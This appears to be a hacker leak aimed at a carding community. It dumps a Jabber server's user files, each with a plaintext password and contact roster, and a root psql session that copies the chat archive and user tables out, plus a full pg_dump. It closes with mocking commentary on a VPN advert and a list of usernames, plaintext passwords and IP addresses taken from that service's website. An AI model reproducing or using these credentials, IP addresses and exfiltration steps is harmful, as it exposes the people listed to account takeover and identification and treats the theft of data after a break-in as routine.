subscribe=''><group>Friends</group></item></query></xdb>
dotsyn.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>ownage</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>dotsyn</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:47:52'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281275221' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>
el!t3.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>huren1</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>el!t3</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:39:06'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280843826' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>
fickmaus.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>t9N#1~R\dKd6</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>fickmaus</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T18:12:17'>registered</x></query><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><query xmlns='jabber:iq:last' last='1281226381' xdbns='jabber:iq:last'>Disconnected</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>swiss</group></item><item jid='crankz@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='freakout@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='hackthenet@jabber-swissfaking.net' name='hackthenet' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='racketeer@jabber-swissfaking.net' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' subscription='from'/><item jid='conference.localhost' subscription='from' ask='subscribe'/><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' name='glycerin@jabber-swissfaking.net' subscription='both'><group>Friends</group></item></query></xdb>
flash.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>12SchneSi</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>flash</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T19:24:16'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280949991' xdbns='jabber:iq:last'/></xdb>
freakout.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Ghana11</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>freakout</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T10:13:13'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280922217' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='Fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='Trickz' subscription='to'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='Afroman' subscription='to'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='crankz@jabber-swissfaking.net' name='Crankz' subscription='both'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Friends</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>
glycerin\40jabber-swissfaking.net.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>kevin123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>glycerin\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100808T11:37:30'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='naik@jabber-swissfaking.net' name='naik' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='theird21@jabber-swissfaking.net' name='theird21' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='racketeer@jabber-swissfaking.net' name='Racketeer' subscription='both'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281295248' xdbns='jabber:iq:last'/></xdb>
hackthenet.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>sonne123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>hackthenet</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T21:49:48'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280918275' xdbns='jabber:iq:last'/></xdb>
hans-wurst.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>volkan</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>hans-wurst</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T09:45:39'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280956100' xdbns='jabber:iq:last'>Disconnected</query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Swiss</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Swiss</group></item><item jid='crankz@jabber-swissfaking.net' name='crankz' subscription='both'><group>Swiss</group></item><item jid='freakout@jabber-swissfaking.net' name='FreakOut' subscription='both'><group>Swiss</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query></xdb>
holzmen.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>jabing</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>holzmen</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:52:11'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280955549' xdbns='jabber:iq:last'/></xdb>
jamyla\40jabber-swissfaking.net.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>2wsx6zhn</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>jamyla\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:58:39'>registered</x></query><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281209105' xdbns='jabber:iq:last'/></xdb>
kappy777.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>kappy777</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>kappy777</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T17:44:43'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280513424' xdbns='jabber:iq:last'/></xdb>
kluless.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>wtf!1337</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>kluless</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100805T11:37:20'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281008315' xdbns='jabber:iq:last'/></xdb>
luigi100.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>frauke</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>luigi100</username><name/><email/><x xmlns='jabber:x:delay' stamp='20100803T03:25:49'>registered</x></query><query xmlns='jabber:iq:last' last='1281300897' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>
naik.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>c15g4</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>naik</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:15:20'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281007640' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='annie90@jabber.ccc.de' name='' subscription='both'><group>Jabber</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='' subscription='from' ask='subscribe'><group>Buddies</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>
nitex.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>19083862</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>nitex</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:37:54'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281271005' xdbns='jabber:iq:last'/></xdb>
racketeer.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>neumsche</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>racketeer</username><name/><email/><x xmlns='jabber:x:delay' stamp='20100803T13:32:38'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='' subscription='to'><group>swiss</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' name='' subscription='both'><group>swiss</group></item></query><query xmlns='jabber:iq:last' last='1281291383' xdbns='jabber:iq:last'>Disconnected</query></xdb>
s0xtech.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>s0xy00</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>s0xtech</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T07:19:17'>registered</x></query><query xmlns='jabber:iq:last' last='1280825558' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>
sinned.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>vollidiot</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>sinned</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T19:03:31'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280862994' xdbns='jabber:iq:last'/></xdb>
st3ffl0r.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>HanZ123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>st3ffl0r</username><name>Ich</name><email>iamweasel@marsmail.de</email><x xmlns='jabber:x:delay' stamp='20100805T11:28:40'>registered</x></query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><PHOTO><TYPE>image/png</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAAF8AAABgCAIAAAD0AjnaAAAAA3NCSVQICAjb4U/gAAAgAElEQVR42oy8WZM...Mv9pCZHqyIEyWcPpVmUv22TEF3l1Kny8Js4m7WTLwiBvyVZn+a5hF/ENYv/jETXn6+WbfO0vYK7nQ1q+MOm5Hc8Nuu23wn2TSuNvKNqKcLc8efYMALyFjEOFaAQHV45gl85/x2yGLznPZ6jM75ju8LsTILanf/GAL4Ybff0qZ9Y8DcN5tCO3/QgU3B1qvXv3n9cgfNLl5Yvlb3PGXttQkAzPbZSNvvmq5yDV8b+PHjYIo8n1+vLpv2es77Hg1wvny59K8JuP+T9PTAv9D/H9sBRgei4KAAAAAElFTkSuQmCC</BINVAL></PHOTO></vCard><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281011278' xdbns='jabber:iq:last'>Disconnected</query></xdb>
syntax\40jabber-swissfaking.net.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>seckin!kilic!91</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>syntax\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:44:55'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'><message id='IoS3Q-21' to='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' from='naik@jabber-swissfaking.net/spark'><x xmlns='jabber:x:event'/><x xmlns='jabber:x:delay' from='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' stamp='20100805T11:07:06'>Offline Storage</x></message></foo><query xmlns='jabber:iq:last' last='1280928948' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Swiss</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Swiss</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Swiss</group></item><item jid='crankz@jabber-swissfaking.net' name='Crankz' subscription='to' subscribe=''><group>Swiss</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='to'><group>Swiss</group></item><item jid='freakout@jabber-swissfaking.net' name='FreakOut' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='naik@jabber-swissfaking.net' name='naik' subscription='to' subscribe=''><group>Swiss</group></item><item jid='el!t3@jabber-swissfaking.net' name='eL!t3' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='yaboybigt@jabber-swissfaking.net' name='yaboybigT' subscription='to'><group>Swiss</group></item><item jid='theird21@jabber-swissfaking.net' name='theird21' subscription='both'><group>Swiss</group></item><item jid='syntex@jabber-swissfaking.net' name='syntex' subscription='both'><group>Swiss</group></item></query></xdb>
syntex.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>swissjabber</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>syntex</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:33:58'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281301960' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>
theird21.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>00025879</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>theird21</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:05:17'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280927487' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>
the|biggie.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>aggro123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>the|biggie</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T20:33:39'>registered</x></query><query xmlns='jabber:iq:last' last='1280970373' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='crankz@jabber-swissfaking.net' name='crankz' subscription='both'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Friends</group></item><item jid='freakout@jabber-swissfaking.net' name='freakout' subscription='both'><group>Friends</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='from' ask='subscribe'><group>Friends</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>
trickz.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>crazyfrog1234</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>trickz</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T21:41:38'>registered</x></query><res id='spark'/><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='from'/><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' subscription='from'/><item jid='s0xtech@jabber-swissfaking.net' subscription='from'/><item jid='crankz@jabber-swissfaking.net' subscription='from'/><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='both'><group>Friends</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281303248' xdbns='jabber:iq:last'>Disconnected</query></xdb>
w!cked.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>fvcxy--</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>w!cked</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T16:19:22'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280852527' xdbns='jabber:iq:last'>Disconnected</query></xdb>
w00dka.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>as_tave_myliu</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>w00dka</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T18:07:26'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281222732' xdbns='jabber:iq:last'/></xdb>
weareone.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Amstaff</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>weareone</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:30:36'>registered</x></query><res id='spark'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='dotsyn@jabber-swissfaking.net' name='dotsyn' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='donteron@thesecure.biz' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1280970363' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>
yaboybigt.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>73818444</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>yaboybigt</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T14:05:19'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281277327' xdbns='jabber:iq:last'/></xdb>
# psql openfire openfire
Password for user openfire:
Welcome to psql 8.3.11, the PostgreSQL interactive terminal.
openfire=# \l
List of databases
Name | Owner | Encoding
-----------+----------+-----------
openfire | openfire | UTF8
postgres | postgres | SQL_ASCII
template0 | postgres | SQL_ASCII
template1 | postgres | SQL_ASCII
(4 rows)
openfire=# \c openfire
You are now connected to database "openfire".
openfire=# \d
List of relations
Schema | Name | Type | Owner
--------+----------------------+-------+----------
public | ofconparticipant | table | openfire
public | ofconversation | table | openfire
public | ofextcomponentconf | table | openfire
public | ofgroup | table | openfire
public | ofgroupprop | table | openfire
public | ofgroupuser | table | openfire
public | ofid | table | openfire
public | ofmessagearchive | table | openfire
public | ofmucaffiliation | table | openfire
public | ofmucconversationlog | table | openfire
public | ofmucmember | table | openfire
public | ofmucroom | table | openfire
public | ofmucroomprop | table | openfire
public | ofmucservice | table | openfire
public | ofmucserviceprop | table | openfire
public | ofoffline | table | openfire
public | ofpresence | table | openfire
public | ofprivacylist | table | openfire
public | ofprivate | table | openfire
public | ofproperty | table | openfire
public | ofpubsubaffiliation | table | openfire
public | ofpubsubdefaultconf | table | openfire
public | ofpubsubitem | table | openfire
public | ofpubsubnode | table | openfire
public | ofpubsubnodegroups | table | openfire
public | ofpubsubnodejids | table | openfire
public | ofpubsubsubscription | table | openfire
public | ofremoteserverconf | table | openfire
public | ofroster | table | openfire
public | ofrostergroups | table | openfire
public | ofrrds | table | openfire
public | ofsaslauthorized | table | openfire
public | ofsecurityauditlog | table | openfire
public | ofuser | table | openfire
public | ofuserflag | table | openfire
public | ofuserprop | table | openfire
public | ofvcard | table | openfire
public | ofversion | table | openfire
(38 rows)
openfire=# COPY ofmessagearchive TO '/tmp/m_lawgs';
COPY 2190
openfire=# COPY ofuser TO '/tmp/u_lawgs';
COPY 313
openfire=# \q
# pg_dump -U openfire openfire > /tmp/full_db
Password:
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| fickmaus@jabber-swissfaking.net: |
| na carders brauch diesesmal wohl länger wa? |
| triple@jabber-swissfaking.net: |
| Jo |
| die haben immer noch ka |
| wie die lücke ist |
| ^^ |
|____________________________________________________________________|
Why don't you shut up and go administrate your own board,
smarty-pants? Owait, Garcon! Make us a sandwich instead, you seem to
know your stuff when it comes to ordering a la carte.
,;~;,
_/\
\ )
(\\ ())
/';;,, // |
-------=========={ Vpn24.org }========))))))))))))))=m( )_ __
| ,(.' '~/()' ' '\
~ | ||( );,
( ,;.)-\ / ';,
\ ( \ (
|| \\
/_( /_(
_____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| Liebe Carders.CC Member, |
| |
| Wir sind wieder da und haben euch Top Angebote mitgebracht :) |
| |
| Wir bieten euch 100% non-logging OpenVPN, Socks5 und SSH Socks |
| Zugang auf unserem eigenen dedicated Server welcher in Russland |
| steht, absolut unantastbar für Deutsche Behörden. Unser |
| kompletter Service ist automatisiert, ihr könnt also schon in |
| wenigen Minuten 100% anonym unterwegs sein. |
| |
| ... | |
| VPN | Socks5 |
| Secure Connection | Secure Connection |
| Encryption AES-1024 | Encryption AES-512 |
|_________________________________|__________________________________|
They offer the carders.cc members 100% non-logging proxies on their
own dedicated server which is located in Russia. They say that there
is no way for German authorities to get access to it and that their
service is fully automatic. The vpn connections are encrypted with
AES-1024 and the socks5 proxies are encrypted with AES-512.
And that sounds awesome! You even invented two new encryptions? Let's
have a look at your webserver first, but, again, before we start, here
is a list (user:plain password:ip:date) from your website:
janitor1:nroknetsr3g:87.118.118.37:January 6, 2011, 8:33 pm
jack123:heimatbrief:92.241.190.230:January 3, 2011, 3:54 pm
shore:shoreshore:202.71.103.246:January 6, 2011, 6:28 pm
hansi3000:w2z_RKDUU:212.117.177.110:January 5, 2011, 4:10 pm
tarnung91:frauholle49:78.52.52.123:January 4, 2011, 11:54 am
djdalio:123123:95.33.214.37:January 3, 2011, 5:03 pm
selfcut:rittersport:88.76.106.196:January 3, 2011, 1:10 pm
donkey:YX!"as78:84.183.121.124:January 3, 2011, 9:07 am
obama123:derneger123:84.137.90.85:January 5, 2011, 5:43 pm
neon1011:hassen11:91.43.254.141:January 3, 2011, 11:54 am
f18black:pizza1:91.33.20.147:January 6, 2011, 2:37 pm
hilli:ickeget6:85.17.161.84:January 6, 2011, 2:35 pm
schmidi327:g5fkigd2:95.33.42.207:January 6, 2011, 11:39 pm
12dima12:jafCc8Nk:212.117.172.231:January 3, 2011, 9:03 pm
blackmatrix:o75ev14J:87.185.157.32:January 7, 2011, 4:16 pm
hanswurst:volkan:92.76.11.157:January 5, 2011, 10:41 pm
ginal406:e*!ohWt7:92.241.190.253:January 3, 2011, 8:14 pm
edgeee:azerty123:92.241.165.69:January 7, 2011, 1:00 am
loowmanz:lowlowlow123:93.202.153.197:January 3, 2011, 7:51 am
basha:kriminell:92.241.165.69:January 4, 2011, 9:42 pm
zezol:4iP]XT4)om:79.170.124.248:January 3, 2011, 8:02 am
